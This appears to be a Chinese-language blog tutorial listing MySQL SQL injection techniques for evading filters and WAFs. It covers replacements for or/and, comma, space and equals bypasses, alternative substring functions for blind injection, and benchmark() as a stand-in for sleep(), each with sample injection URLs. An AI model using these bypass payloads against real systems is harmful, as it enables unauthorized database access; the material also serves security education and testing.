作者:小刚
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢
本实验仅用于信息防御教学,切勿用于它用途
SQL注入技巧
- SQL小技巧
- 1,运算逻辑符号
- or替代
- and替代
- 异或运算符 ”^”
- 逗号
- 空格
- 等于号”=”
- 2,盲注函数被过滤
- left(str, length)
- right(str,length)
- mid(str,start,length)
- Locate(substr,str)
- position (substr IN str)
- 替代ascii
- 3,其他
- sleep过滤
- database(),version()被过滤
- 报错注入
SQL小技巧
SQL注入不会的可以阅读我的这两篇博客哦
sql手工注入
数据库类型判断
在平常的SQL注入过程中,难免会存在一些敏感函数被过滤,或者被WAF识别所拦截。所以我们可以通过其他不常用的函数来绕过过滤,实现相同的效果。在此只通过MYSQL数据库来表达意思,其他数据库自行百度谷歌。。。。。。
1,运算逻辑符号
注入过程中,用到最最最频繁的就是逻辑符号,像and 1=1、or 2>1等。当发现and,or,=等逻辑符号被过滤后我就很气愤。气愤归气愤,我们可以通过别的特殊符号来替代他们,这样就该他们气愤了,哈哈哈。。。。
or替代
当发现or被过滤时,我们可以用”||”替代
1 2 | ?id = 2' or 1=1 --+ ?id = 2' || 1=1 --+ |
and替代
当发现and被过滤时,我们可以用”&&”替代
1 2 | ?id = 1' and 1=1 --+ ?id = 1' && 1=1 --+ |
异或运算符 ”^”
异或运算符”^”过滤时,用”XOR”替代
1 2 | ?id=1 union select 1=1 XOR 1=1--+ ?id=1 union select 1=1 ^ 1=1 --+ |
逗号
逗号被过滤可以使用join函数将参数连接起来
1 2 | ?id=1 union select 11,22,33--+ ?id=1 union select * from (select 11)a join (select 22)b join (select 33)c --+ |
空格
当空格被过滤删除时,使用加号 +,或者空字符串来代替
通用空字符串:%0a %0b %0c %0d %A0 %20 %09
特别注意 %A0 这个不会被php的\s进行匹配
使用内联注释也可以代替空格/**/
1 2 3 | ?id=1 and 1=1 --+ ?id=1%A0and%A01=1%A0--+ ?id=1/**/and/**/1=1/**/--+ |
等于号”=”
当等于号”=”被过滤时,可以使用很多种函数替代
Between:在什么什么之间
1 | select database() between 0x61 and 0x7a |
(2) in:in常用于mysql的where表达式中来查询某个范围内的数据
1 | select * from user where id in (1,2,3) |
(3) Like:模糊查询,可以当等于号用
1 2 | ?id=2 and 1 like 1 ?id = 1.1 and 1=1 |
(4) 使用正则代替等于号,regexp等同于rlike
2,盲注函数被过滤
在进行盲注时候,用的最多的就是substr()截取字符串,当此函数被过滤,我们可以使用其他函数截取字符串
left(str, length)
从左边length位截取字符串
select left(‘abcdefghijklmn’,8)
结果为:abcdefgh
right(str,length)
使用方法同left
mid(str,start,length)
截取字符串从start开始并截取length长度,相当于substr()
Locate(substr,str)
locate是用来返回字符串的位置
locate(substr,str)返回字符串substr中第一次出现str的位置
1 | select locate("d",'www.baidu.com') #返回8 |
locate(substr,str,pos)返回字符串substr中第一次出现str的位置,从第pos个位置开始
1 | SELECT locate("a",'pan.baidu.com',3)#返回6 |
locate()用来判断字符串长度
1 | select locate('m','m123456m',15) |
position (substr IN str)
position 的效果与instr(),locate()相同,但语法不同
用法:POSITION(substr IN str) 返回字符串substr中第一次出现str的位置与LOCATE(substr,str)的结果相同
例:返回字符串“d”自一次出现的位置
SELECT position("d"in’www.baidu.com’);
结果:8
替代ascii
Hex(),Bin(),Ord()
字符串截取函数在mysql中有许多,主要利用得当,一样可以达到盲注的效果
3,其他
sleep过滤
当sleep函数被过滤,可以使用benchmark函数。他是指执行某函数的次数,次数多了照样实现sleep函数相同的时间延迟。
1 | benchmark(100000,SHA1(‘1’)), 1 |
database(),version()被过滤
当database(),concat()函数被过滤,可以在名和括号之间加入特殊字符,例如
1 2 | database/**/() `version`() |
报错注入
报错注入是利用某些函数报错,来爆出所需要的内容,可以阅读此文章来了解报错注入:
报错注入